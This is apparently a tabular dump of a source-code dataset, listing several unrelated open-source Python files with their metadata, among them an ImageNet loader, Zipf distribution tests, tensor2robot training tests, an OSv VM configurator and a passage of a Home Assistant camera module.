content
stringlengths 7
928k
| avg_line_length
float64 3.5
33.8k
| max_line_length
int64 6
139k
| alphanum_fraction
float64 0.08
0.96
| licenses
sequence | repository_name
stringlengths 7
104
| path
stringlengths 4
230
| size
int64 7
928k
| lang
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|
import os
import cv2
from PIL import Image
import torch
import mmcv
import numpy as np
from torch.utils.data import Dataset
import torchvision.transforms as T
from torchvision.datasets import ImageFolder
class ImageNetDataset(Dataset):
def __init__(self,
data_root,
test_mode=False,**kwargs):
self.classes = list(range(1000))
normalize = T.Normalize(mean=[0.456], std=[1.0])
#normalize = T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
if not test_mode:
traindir = os.path.join(data_root, 'train')
self.dataset = ImageFolder(traindir, T.Compose([
T.Grayscale(num_output_channels=1),
T.RandomResizedCrop(224, scale=(0.8, 1.0)),
T.RandomHorizontalFlip(),
T.ToTensor(),
normalize,
]))
else:
valdir = os.path.join(data_root, 'val')
self.dataset = ImageFolder(valdir, T.Compose([
T.Resize(256),
T.CenterCrop(224),
T.ToTensor(),
normalize,
]))
if not test_mode:
self._set_group_flag()
def _set_group_flag(self):
"""Set flag according to image aspect ratio.
Images with aspect ratio greater than 1 will be set as group 1,
otherwise group 0.
"""
self.flag = np.zeros(len(self), dtype=np.uint8)
def __getitem__(self, idx):
d = dict(img=self.dataset[idx][0], label=torch.tensor([self.dataset[idx][1]], dtype=torch.long))
return d
def __len__(self):
return len(self.dataset)
| 32.254237 | 104 | 0.504467 | [
"Apache-2.0"
] | anorthman/mmdetection | mmdet/datasets/classify/imagenet.py | 1,903 | Python |
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
from scipy import stats
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_case
from tensorflow_probability.python.internal import test_util as tfp_test_util
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import,g-import-not-at-top
tfd = tfp.distributions
@test_util.run_all_in_graph_and_eager_modes
class ZipfTest(test_case.TestCase):
def assertBetween(self, x, minimum, maximum):
self.assertGreaterEqual(x, minimum)
self.assertLessEqual(x, maximum)
def assertAllBetween(self, a, minval, maxval, atol=1e-6):
a = self._GetNdArray(a)
minval = self._GetNdArray(minval)
maxval = self._GetNdArray(maxval)
self.assertEqual(a.shape, minval.shape)
self.assertEqual(a.shape, maxval.shape)
for idx, _ in np.ndenumerate(a):
self.assertBetween(a[idx], minval[idx] - atol, maxval[idx] + atol)
def testZipfShape(self):
power = tf.constant([3.0] * 5)
zipf = tfd.Zipf(power=power)
self.assertEqual(self.evaluate(zipf.batch_shape_tensor()), (5,))
self.assertEqual(zipf.batch_shape, tf.TensorShape([5]))
self.assertAllEqual(self.evaluate(zipf.event_shape_tensor()), [])
self.assertEqual(zipf.event_shape, tf.TensorShape([]))
def testInvalidPower(self):
invalid_powers = [-.02, 0.5, -2., .99, 1.]
for power in invalid_powers:
with self.assertRaisesOpError("Condition x > y"):
zipf = tfd.Zipf(power=power, validate_args=True)
self.evaluate(zipf.power)
def testNanPower(self):
zipf = tfd.Zipf(power=np.nan, validate_args=False)
self.assertAllNan(self.evaluate(zipf.power))
def testValidPower_ImplicitlyConvertsToFloat32(self):
powers = [2, 10, 1.1]
for power in powers:
zipf = tfd.Zipf(power=power, validate_args=True)
self.assertEqual(zipf.power.dtype, tf.float32)
def testEventDtype(self):
for power_dtype in [tf.float32, tf.float64]:
for event_dtype in [tf.int32, tf.int64, tf.float32, tf.float64]:
power_dtype = tf.float32
event_dtype = tf.int32
power = tf.constant(5., dtype=power_dtype)
zipf = tfd.Zipf(power=power, dtype=event_dtype)
self.assertEqual(zipf.dtype, event_dtype)
self.assertEqual(zipf.dtype, zipf.sample(10).dtype)
self.assertEqual(zipf.dtype, zipf.sample(1).dtype)
self.assertEqual(zipf.dtype, zipf.mode().dtype)
def testInvalidEventDtype(self):
with self.assertRaisesWithPredicateMatch(
TypeError, "power.dtype .* not a supported .* type"):
power = tf.constant(5., dtype=tf.float16)
zipf = tfd.Zipf(power=power, dtype=tf.int32, validate_args=True)
self.evaluate(zipf.sample())
def testZipfLogPmf_InvalidArgs(self):
power = tf.constant([4.0])
# Non-integer samples are rejected if validate_args is True and
# interpolate_nondiscrete is False.
non_integer_samples = [0.99, 4.5, 5.001, 1e-6, -3, -2, -1, -0., 0]
for x in non_integer_samples:
zipf = tfd.Zipf(
power=power, interpolate_nondiscrete=False, validate_args=True)
with self.assertRaisesOpError("Condition (x == y|x > 0)"):
self.evaluate(zipf.log_prob(x))
with self.assertRaisesOpError("Condition (x == y|x > 0)"):
self.evaluate(zipf.prob(x))
def testZipfLogPmf_IntegerArgs(self):
batch_size = 9
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = np.array([-3., -0., 0., 2., 3., 4., 5., 6., 7.], dtype=np.float32)
zipf = tfd.Zipf(power=power)
log_pmf = zipf.log_prob(x)
self.assertEqual((batch_size,), log_pmf.shape)
self.assertAllClose(self.evaluate(log_pmf), stats.zipf.logpmf(x, power_v))
pmf = zipf.prob(x)
self.assertEqual((batch_size,), pmf.shape)
self.assertAllClose(self.evaluate(pmf), stats.zipf.pmf(x, power_v))
def testZipfLogPmf_NonIntegerArgs(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3., -0.5, 0., 2., 2.2, 3., 3.1, 4., 5., 5.5, 6., 7.2]
zipf = tfd.Zipf(power=power)
log_pmf = zipf.log_prob(x)
self.assertEqual((batch_size,), log_pmf.shape)
# Check that log_pmf(x) of tfd.Zipf is between the values of
# stats.zipf.logpmf for ceil(x) and floor(x).
log_pmf_values = self.evaluate(log_pmf)
floor_x = np.floor(x)
ceil_x = np.ceil(x)
self.assertAllBetween(log_pmf_values, stats.zipf.logpmf(ceil_x, power_v),
stats.zipf.logpmf(floor_x, power_v))
# Check that pmf(x) of tfd.Zipf is between the values of stats.zipf.pmf for
# ceil(x) and floor(x).
pmf = zipf.prob(x)
self.assertEqual((batch_size,), pmf.shape)
pmf_values = self.evaluate(pmf)
self.assertAllBetween(pmf_values, stats.zipf.pmf(ceil_x, power_v),
stats.zipf.pmf(floor_x, power_v))
def testZipfLogPmf_NonIntegerArgsNoInterpolation(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3., -0.5, 0., 2., 2.2, 3., 3.1, 4., 5., 5.5, 6., 7.2]
zipf = tfd.Zipf(power=power, interpolate_nondiscrete=False)
log_pmf = zipf.log_prob(x)
self.assertEqual((batch_size,), log_pmf.shape)
log_pmf_values = self.evaluate(log_pmf)
self.assertAllClose(log_pmf_values, stats.zipf.logpmf(x, power_v))
pmf = zipf.prob(x)
self.assertEqual((batch_size,), pmf.shape)
pmf_values = self.evaluate(pmf)
self.assertAllClose(pmf_values, stats.zipf.pmf(x, power_v))
def testZipfLogPmfMultidimensional_IntegerArgs(self):
batch_size = 6
power = tf.constant([[2.0, 4.0, 5.0]] * batch_size)
power_v = [2.0, 4.0, 5.0]
x = np.array([[2.1, 3.5, 4.9, 5., 6.6, 7.]], dtype=np.int32).T
zipf = tfd.Zipf(power=power)
log_pmf = zipf.log_prob(x)
self.assertEqual((6, 3), log_pmf.shape)
self.assertAllClose(self.evaluate(log_pmf), stats.zipf.logpmf(x, power_v))
pmf = zipf.prob(x)
self.assertEqual((6, 3), pmf.shape)
self.assertAllClose(self.evaluate(pmf), stats.zipf.pmf(x, power_v))
def testZipfLogPmfMultidimensional_NonIntegerArgs(self):
batch_size = 6
power = tf.constant([[2.0, 4.0, 5.0]] * batch_size)
power_v = [2.0, 4.0, 5.0]
x = np.array([[2., 3.2, 4.3, 5.5, 6.9, 7.]], dtype=np.float32).T
floor_x = np.floor(x)
ceil_x = np.ceil(x)
zipf = tfd.Zipf(power=power)
log_pmf = zipf.log_prob(x)
self.assertEqual((6, 3), log_pmf.shape)
self.assertAllBetween(
self.evaluate(log_pmf), stats.zipf.logpmf(ceil_x, power_v),
stats.zipf.logpmf(floor_x, power_v))
pmf = zipf.prob(x)
self.assertEqual((6, 3), pmf.shape)
self.assertAllBetween(
self.evaluate(pmf), stats.zipf.pmf(ceil_x, power_v),
stats.zipf.pmf(floor_x, power_v))
def testZipfCdf_IntegerArgs(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8]
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((batch_size,), log_cdf.shape)
self.assertAllClose(self.evaluate(log_cdf), stats.zipf.logcdf(x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((batch_size,), cdf.shape)
self.assertAllClose(self.evaluate(cdf), stats.zipf.cdf(x, power_v))
def testZipfCdf_NonIntegerArgsNoInterpolation(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3.5, -0.5, 0., 1, 1.1, 2.2, 3.1, 4., 5., 5.5, 6.4, 7.8]
zipf = tfd.Zipf(power=power, interpolate_nondiscrete=False)
log_cdf = zipf.log_cdf(x)
self.assertEqual((batch_size,), log_cdf.shape)
self.assertAllClose(self.evaluate(log_cdf), stats.zipf.logcdf(x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((batch_size,), cdf.shape)
self.assertAllClose(self.evaluate(cdf), stats.zipf.cdf(x, power_v))
def testZipfCdf_NonIntegerArgsInterpolated(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3.5, -0.5, 0., 1, 1.1, 2.2, 3.1, 4., 5., 5.5, 6.4, 7.8]
floor_x = np.floor(x)
ceil_x = np.ceil(x)
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((batch_size,), log_cdf.shape)
self.assertAllBetween(
self.evaluate(log_cdf), stats.zipf.logcdf(floor_x, power_v),
stats.zipf.logcdf(ceil_x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((batch_size,), cdf.shape)
self.assertAllBetween(
self.evaluate(cdf), stats.zipf.cdf(floor_x, power_v),
stats.zipf.cdf(ceil_x, power_v))
def testZipfCdf_NonIntegerArgs(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3.5, -0.5, 0., 1, 1.1, 2.2, 3.1, 4., 5., 5.5, 6.4, 7.8]
floor_x = np.floor(x)
ceil_x = np.ceil(x)
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((batch_size,), log_cdf.shape)
self.assertAllBetween(
self.evaluate(log_cdf), stats.zipf.logcdf(floor_x, power_v),
stats.zipf.logcdf(ceil_x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((batch_size,), cdf.shape)
self.assertAllBetween(
self.evaluate(cdf), stats.zipf.cdf(floor_x, power_v),
stats.zipf.cdf(ceil_x, power_v))
def testZipfCdfMultidimensional_IntegerArgs(self):
batch_size = 6
power = tf.constant([[2.0, 4.0, 5.0]] * batch_size)
power_v = [2.0, 4.0, 5.0]
x = np.array([[2., 3., 4., 5., 6., 7.]], dtype=np.float32).T
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((6, 3), log_cdf.shape)
self.assertAllClose(self.evaluate(log_cdf), stats.zipf.logcdf(x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((6, 3), cdf.shape)
self.assertAllClose(self.evaluate(cdf), stats.zipf.cdf(x, power_v))
def testZipfCdfMultidimensional_NonIntegerArgs(self):
batch_size = 6
power = tf.constant([[2.0, 4.0, 5.0]] * batch_size)
power_v = [2.0, 4.0, 5.0]
x = np.array([[2.3, 3.5, 4.1, 5.5, 6.8, 7.9]], dtype=np.float32).T
floor_x = np.floor(x)
ceil_x = np.ceil(x)
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((6, 3), log_cdf.shape)
self.assertAllBetween(
self.evaluate(log_cdf), stats.zipf.logcdf(floor_x, power_v),
stats.zipf.logcdf(ceil_x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((6, 3), cdf.shape)
self.assertAllBetween(
self.evaluate(cdf), stats.zipf.cdf(floor_x, power_v),
stats.zipf.cdf(ceil_x, power_v))
def testZipfMean(self):
power_v = [2.0, 3.0, 2.5]
zipf = tfd.Zipf(power=power_v)
self.assertEqual((3,), zipf.mean().shape)
self.assertAllClose(self.evaluate(zipf.mean()), stats.zipf.mean(power_v))
def testZipfVariance(self):
power_v = [4.0, 3.0, 5.5] # var is undefined for power <= 3
zipf = tfd.Zipf(power=power_v)
self.assertEqual((3,), zipf.variance().shape)
stat_vars = np.vectorize(stats.zipf.var)(power_v)
self.assertAllClose(self.evaluate(zipf.variance()), stat_vars)
def testZipfStd(self):
power_v = [4.0, 3.5, 4.5]
zipf = tfd.Zipf(power=power_v)
self.assertEqual((3,), zipf.stddev().shape)
stat_stddevs = np.vectorize(stats.zipf.std)(power_v)
self.assertAllClose(self.evaluate(zipf.stddev()), stat_stddevs)
def testZipfMode(self):
power_v = [10.0, 3.0, 2.5, 3.2, 1.1, 0.05]
zipf = tfd.Zipf(power=power_v)
self.assertEqual((6,), zipf.mode().shape)
self.assertAllClose(self.evaluate(zipf.mode()), np.ones_like(power_v))
def testZipfSample(self):
power_v = 5.
n = int(500e4)
for power_dtype in [tf.float32, tf.float64]:
power = tf.constant(power_v, dtype=power_dtype)
for dtype in [tf.int32, tf.int64, tf.float32, tf.float64]:
zipf = tfd.Zipf(power=power, dtype=dtype)
samples = zipf.sample(n, seed=tfp_test_util.test_seed())
sample_values = self.evaluate(samples)
self.assertEqual((n,), samples.shape)
self.assertEqual((n,), sample_values.shape)
self.assertAllClose(
sample_values.mean(), stats.zipf.mean(power_v), rtol=.01)
self.assertAllClose(
sample_values.std(), stats.zipf.std(power_v), rtol=.03)
def testZipfSample_ValidateArgs(self):
power_v = 3.
n = int(100e3)
for power_dtype in [tf.float32, tf.float64]:
power = tf.constant(power_v, dtype=power_dtype)
for dtype in [tf.int32, tf.int64, tf.float32, tf.float64]:
zipf = tfd.Zipf(power=power, dtype=dtype, validate_args=True)
samples = zipf.sample(n, seed=tfp_test_util.test_seed())
self.evaluate(samples)
def testZipfSampleMultidimensionalMean(self):
power_v = np.array([np.arange(5, 15, dtype=np.float32)]) # 1 x 10
zipf = tfd.Zipf(power=power_v)
n = int(100e3)
samples = zipf.sample(n, seed=tfp_test_util.test_seed())
sample_values = self.evaluate(samples)
self.assertEqual((n, 1, 10,), samples.shape)
self.assertEqual((n, 1, 10,), sample_values.shape)
# stats.zipf wants float64 params.
stats_mean = np.vectorize(stats.zipf.mean)(power_v.astype(np.float64))
self.assertAllClose(sample_values.mean(axis=0), stats_mean, rtol=.01)
def testZipfSampleMultidimensionalStd(self):
power_v = np.array([np.arange(5, 10, dtype=np.float32)]) # 1 x 5
zipf = tfd.Zipf(power=power_v)
n = int(100e4)
samples = zipf.sample(n, seed=tfp_test_util.test_seed())
sample_values = self.evaluate(samples)
self.assertEqual((n, 1, 5), samples.shape)
self.assertEqual((n, 1, 5), sample_values.shape)
# stats.zipf wants float64 params.
stats_std = np.vectorize(stats.zipf.std)(power_v.astype(np.float64))
self.assertAllClose(sample_values.std(axis=0), stats_std, rtol=.04)
# Test that sampling with the same seed twice gives the same results.
def testZipfSampleMultipleTimes(self):
n = 1000
seed = tfp_test_util.test_seed()
power = 1.5
zipf1 = tfd.Zipf(power=power, name="zipf1")
tf.compat.v1.set_random_seed(seed)
samples1 = self.evaluate(zipf1.sample(n, seed=seed))
zipf2 = tfd.Zipf(power=power, name="zipf2")
tf.compat.v1.set_random_seed(seed)
samples2 = self.evaluate(zipf2.sample(n, seed=seed))
self.assertAllEqual(samples1, samples2)
def testZipfSample_AvoidsInfiniteLoop(self):
zipf = tfd.Zipf(power=1.)
n = 1000
self.evaluate(zipf.sample(n, seed=tfp_test_util.test_seed()))
if __name__ == "__main__":
tf.test.main()
| 36.584726 | 115 | 0.666058 | [
"Apache-2.0"
] | ColCarroll/probability | tensorflow_probability/python/distributions/zipf_test.py | 15,329 | Python |
"""Implements interface for OSv unikernels."""
from backend.vm import VMConfig
from os import path
from .imgedit import set_cmdline
class OSv:
cmdline_template = "--ip=eth0,{ipv4_addr},255.255.255.0 --nameserver=10.0.125.0 {extra_cmdline}"
@staticmethod
def configure(image, config, nic_name):
cmdline = OSv.cmdline_template.format(
ipv4_addr=config.ipv4_addr,
extra_cmdline=config.cmdline if config.cmdline else image.default_cmdline,
)
set_cmdline(path.join(image.root, 'system.qemu'), cmdline)
vmc = VMConfig(
name=config.name,
nic_name=nic_name,
num_cpus=4,
vdisk_path=path.join(image.root, 'system.qemu'),
vdisk_format='qcow2',
memory_size=1024000
)
return vmc
| 29.535714 | 100 | 0.634825 | [
"MIT"
] | Cunik/Cunik-engine | backend/unikernel/osv/__init__.py | 827 | Python |
#
# Captions:
#
project_title="Services Repository"
project_owner1=""
project_owner2=""
project_cip="ServiceRepo"
nav_up="To the top"
cap_findsrv="Find service"
cap_findsrv_desc="Find service by JSON key"
cap_findsrvtag_desc="...or by query variable, tag etc."
cap_injson="Incoming JSON"
cap_outjson="Outgoing JSON"
cap_search_and="AND"
cap_search_or="OR"
cap_showall_conf="Show all saved services?"
#
b_find="Find service"
b_findall="Show all"
#
err_emptyq="Empty search query"
| 16.758621 | 55 | 0.771605 | [
"MIT"
] | divlv/servicerepo | www/captions.py | 486 | Python |
# coding=utf-8
# Copyright 2019 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for tensor2robot.train_eval."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
from absl import flags
import gin
import mock
import numpy as np
from six.moves import zip
from tensor2robot.hooks import hook_builder
from tensor2robot.models import abstract_model
from tensor2robot.preprocessors import noop_preprocessor
from tensor2robot.utils import mocks
from tensor2robot.utils import train_eval
import tensorflow.compat.v1 as tf
from tensorflow.contrib import predictor as contrib_predictor
FLAGS = flags.FLAGS
_MAX_TRAIN_STEPS = 400
_EVAL_STEPS = 40
_BATCH_SIZE = 4
_EVAL_THROTTLE_SECS = 0.0
class FakeHook(tf.train.SessionRunHook):
def __init__(self):
self._mock = mock.MagicMock()
def begin(self):
self._mock.begin()
return
@property
def mock(self):
return self._mock
class FakeHookBuilder(hook_builder.HookBuilder):
def __init__(self):
self._hook = FakeHook()
def create_hooks(self, *args, **kwargs):
del args, kwargs
return [self._hook]
@property
def hook_mock(self):
return self._hook.mock
class TrainEvalTest(tf.test.TestCase):
def _compute_total_loss(self, labels, logits):
"""Summation of the categorical hinge loss for labels and logits."""
error = 0.
for label, logit in zip(labels, logits):
# Reference tensorflow implementation can be found in keras.losses.
positive = (label * logit)
negative = ((1 - label) * logit)
error += np.maximum(0., negative - positive + 1.)
return error
def test_train_eval_model(self):
"""Tests that a simple model trains and exported models are valid."""
gin.bind_parameter('tf.estimator.RunConfig.save_checkpoints_steps', 100)
model_dir = self.create_tempdir().full_path
mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor)
mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
mock_input_generator_eval = mocks.MockInputGenerator(batch_size=1)
fake_hook_builder = FakeHookBuilder()
train_eval.train_eval_model(
t2r_model=mock_t2r_model,
input_generator_train=mock_input_generator_train,
input_generator_eval=mock_input_generator_eval,
max_train_steps=_MAX_TRAIN_STEPS,
model_dir=model_dir,
train_hook_builders=[fake_hook_builder],
eval_hook_builders=[fake_hook_builder],
eval_steps=_EVAL_STEPS,
eval_throttle_secs=_EVAL_THROTTLE_SECS,
create_exporters_fn=train_eval.create_default_exporters)
self.assertTrue(fake_hook_builder.hook_mock.begin.called)
# We ensure that both numpy and tf_example inference models are exported.
best_exporter_numpy_path = os.path.join(model_dir, 'export',
'best_exporter_numpy', '*')
numpy_model_paths = sorted(tf.io.gfile.glob(best_exporter_numpy_path))
# There should be at least 1 exported model.
self.assertGreater(len(numpy_model_paths), 0)
# This mock network converges nicely which is why we have several best
# models, by default we keep the best 5 and the latest one is always the
# best.
self.assertLessEqual(len(numpy_model_paths), 5)
best_exporter_tf_example_path = os.path.join(
model_dir, 'export', 'best_exporter_tf_example', '*')
tf_example_model_paths = sorted(
tf.io.gfile.glob(best_exporter_tf_example_path))
# There should be at least 1 exported model.
self.assertGreater(len(tf_example_model_paths), 0)
# This mock network converges nicely which is why we have several best
# models, by default we keep the best 5 and the latest one is always the
# best.
self.assertLessEqual(len(tf_example_model_paths), 5)
# We test both saved models within one test since the bulk of the time
# is spent training the model in the firstplace.
# Verify that the serving estimator does exactly the same as the normal
# estimator with all the parameters.
estimator_predict = tf.estimator.Estimator(
model_fn=mock_t2r_model.model_fn,
config=tf.estimator.RunConfig(model_dir=model_dir))
prediction_ref = estimator_predict.predict(
input_fn=mock_input_generator_eval.create_dataset_input_fn(
mode=tf.estimator.ModeKeys.EVAL))
# Now we can load our exported estimator graph with the numpy feed_dict
# interface, there are no dependencies on the model_fn or preprocessor
# anymore.
# We load the latest model since it had the best eval performance.
numpy_predictor_fn = contrib_predictor.from_saved_model(
numpy_model_paths[-1])
features, labels = mock_input_generator_eval.create_numpy_data()
ref_error = self._compute_total_loss(
labels, [val['logit'].flatten() for val in prediction_ref])
numpy_predictions = []
for feature, label in zip(features, labels):
predicted = numpy_predictor_fn({'x': feature.reshape(
1, -1)})['logit'].flatten()
numpy_predictions.append(predicted)
# This ensures that we actually achieve near-perfect classification.
if label > 0:
self.assertGreater(predicted[0], 0)
else:
self.assertLess(predicted[0], 0)
numpy_error = self._compute_total_loss(labels, numpy_predictions)
# Now we can load our exported estimator graph with the tf_example feed_dict
# interface, there are no dependencies on the model_fn or preprocessor
# anymore.
# We load the latest model since it had the best eval performance.
tf_example_predictor_fn = contrib_predictor.from_saved_model(
tf_example_model_paths[-1])
tf_example_predictions = []
for feature, label in zip(features, labels):
# We have to create our serialized tf.Example proto.
example = tf.train.Example()
example.features.feature['measured_position'].float_list.value.extend(
feature)
feed_dict = {
'input_example_tensor':
np.array(example.SerializeToString()).reshape(1,)
}
predicted = tf_example_predictor_fn(feed_dict)['logit'].flatten()
tf_example_predictions.append(predicted)
# This ensures that we actually achieve perfect classification.
if label > 0:
self.assertGreater(predicted[0], 0)
else:
self.assertLess(predicted[0], 0)
tf_example_error = self._compute_total_loss(labels, tf_example_predictions)
np.testing.assert_almost_equal(tf_example_error, numpy_error)
# The exported saved models both have to have the same performance and since
# we train on eval on the same fixed dataset the latest and greatest
# model error should also be the best.
np.testing.assert_almost_equal(ref_error, tf_example_error, decimal=3)
def test_init_from_checkpoint_global_step(self):
"""Tests that a simple model trains and exported models are valid."""
gin.bind_parameter('tf.estimator.RunConfig.save_checkpoints_steps', 100)
gin.bind_parameter('tf.estimator.RunConfig.keep_checkpoint_max', 3)
model_dir = self.create_tempdir().full_path
mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor)
mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
train_eval.train_eval_model(
t2r_model=mock_t2r_model,
input_generator_train=mock_input_generator_train,
max_train_steps=_MAX_TRAIN_STEPS,
model_dir=model_dir,
eval_steps=_EVAL_STEPS,
eval_throttle_secs=_EVAL_THROTTLE_SECS,
create_exporters_fn=train_eval.create_default_exporters)
# The model trains for 200 steps and saves a checkpoint each 100 steps and
# keeps 3 -> len == 3.
self.assertLen(tf.io.gfile.glob(os.path.join(model_dir, 'model*.meta')), 3)
# The continuous training has its own directory.
continue_model_dir = self.create_tempdir().full_path
init_from_checkpoint_fn = functools.partial(
abstract_model.default_init_from_checkpoint_fn, checkpoint=model_dir)
continue_mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor,
init_from_checkpoint_fn=init_from_checkpoint_fn)
continue_mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
train_eval.train_eval_model(
t2r_model=continue_mock_t2r_model,
input_generator_train=continue_mock_input_generator_train,
model_dir=continue_model_dir,
max_train_steps=_MAX_TRAIN_STEPS + 100,
eval_steps=_EVAL_STEPS,
eval_throttle_secs=_EVAL_THROTTLE_SECS,
create_exporters_fn=train_eval.create_default_exporters)
# If the model was successful restored including the global step, only 1
# additional checkpoint to the init one should be created -> len == 2.
self.assertLen(
tf.io.gfile.glob(os.path.join(continue_model_dir, 'model*.meta')), 2)
def test_init_from_checkpoint_use_avg_model_params_and_weights(self):
"""Tests that a simple model trains and exported models are valid."""
gin.bind_parameter('tf.estimator.RunConfig.save_checkpoints_steps', 100)
gin.bind_parameter('tf.estimator.RunConfig.keep_checkpoint_max', 3)
model_dir = self.create_tempdir().full_path
mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor,
use_avg_model_params=True)
mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
mock_input_generator = mocks.MockInputGenerator(batch_size=1)
mock_input_generator.set_specification_from_model(
mock_t2r_model, tf.estimator.ModeKeys.TRAIN)
train_eval.train_eval_model(
t2r_model=mock_t2r_model,
input_generator_train=mock_input_generator_train,
max_train_steps=_MAX_TRAIN_STEPS,
model_dir=model_dir)
init_checkpoint = tf.train.NewCheckpointReader(
tf.train.latest_checkpoint(model_dir))
# Verify that the serving estimator does exactly the same as the normal
# estimator with all the parameters.
initial_estimator_predict = tf.estimator.Estimator(
model_fn=mock_t2r_model.model_fn,
config=tf.estimator.RunConfig(model_dir=model_dir))
# pylint: disable=g-complex-comprehension
initial_predictions = [
prediction['logit'] for prediction in list(
initial_estimator_predict.predict(
input_fn=mock_input_generator.create_dataset_input_fn(
mode=tf.estimator.ModeKeys.EVAL)))
]
# The continuous training has its own directory.
continue_model_dir = self.create_tempdir().full_path
init_from_checkpoint_fn = functools.partial(
abstract_model.default_init_from_checkpoint_fn, checkpoint=model_dir)
continue_mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor,
init_from_checkpoint_fn=init_from_checkpoint_fn)
continue_mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
# Re-initialize the model and train for one step, basically the same
# performance as the original model.
train_eval.train_eval_model(
t2r_model=continue_mock_t2r_model,
input_generator_train=continue_mock_input_generator_train,
model_dir=continue_model_dir,
max_train_steps=_MAX_TRAIN_STEPS)
continue_checkpoint = tf.train.NewCheckpointReader(
tf.train.latest_checkpoint(continue_model_dir))
for tensor_name, _ in tf.train.list_variables(model_dir):
if 'ExponentialMovingAverage' in tensor_name:
# These values are replaced by the swapping saver when using the
# use_avg_model_params.
continue
if 'Adam' in tensor_name:
# The adam optimizer values are not required.
continue
if 'global_step' in tensor_name:
# The global step will be incremented by 1.
continue
self.assertAllClose(
init_checkpoint.get_tensor(tensor_name),
continue_checkpoint.get_tensor(tensor_name),
atol=1e-3)
# Verify that the serving estimator does exactly the same as the normal
# estimator with all the parameters.
continue_estimator_predict = tf.estimator.Estimator(
model_fn=mock_t2r_model.model_fn,
config=tf.estimator.RunConfig(model_dir=continue_model_dir))
continue_predictions = [
prediction['logit'] for prediction in list(
continue_estimator_predict.predict(
input_fn=mock_input_generator.create_dataset_input_fn(
mode=tf.estimator.ModeKeys.EVAL)))
]
self.assertTrue(
np.allclose(initial_predictions, continue_predictions, atol=1e-1))
# A randomly initialized model estimator with all the parameters.
random_estimator_predict = tf.estimator.Estimator(
model_fn=mock_t2r_model.model_fn)
random_predictions = [
prediction['logit'] for prediction in list(
random_estimator_predict.predict(
input_fn=mock_input_generator.create_dataset_input_fn(
mode=tf.estimator.ModeKeys.EVAL)))
]
self.assertFalse(
np.allclose(initial_predictions, random_predictions, atol=1e-2))
if __name__ == '__main__':
tf.test.main()
| 39.611268 | 80 | 0.732399 | [
"Apache-2.0"
] | AakashOfficial/tensor2robot | utils/train_eval_test.py | 14,062 | Python |
"""Support for Agent camera streaming."""
from datetime import timedelta
import logging
from agent import AgentError
from homeassistant.components.camera import SUPPORT_ON_OFF
from homeassistant.components.mjpeg.camera import (
CONF_MJPEG_URL,
CONF_STILL_IMAGE_URL,
MjpegCamera,
filter_urllib3_logging,
)
from homeassistant.const import ATTR_ATTRIBUTION, CONF_NAME
from homeassistant.helpers import entity_platform
from .const import (
ATTRIBUTION,
CAMERA_SCAN_INTERVAL_SECS,
CONNECTION,
DOMAIN as AGENT_DOMAIN,
)
SCAN_INTERVAL = timedelta(seconds=CAMERA_SCAN_INTERVAL_SECS)
_LOGGER = logging.getLogger(__name__)
_DEV_EN_ALT = "enable_alerts"
_DEV_DS_ALT = "disable_alerts"
_DEV_EN_REC = "start_recording"
_DEV_DS_REC = "stop_recording"
_DEV_SNAP = "snapshot"
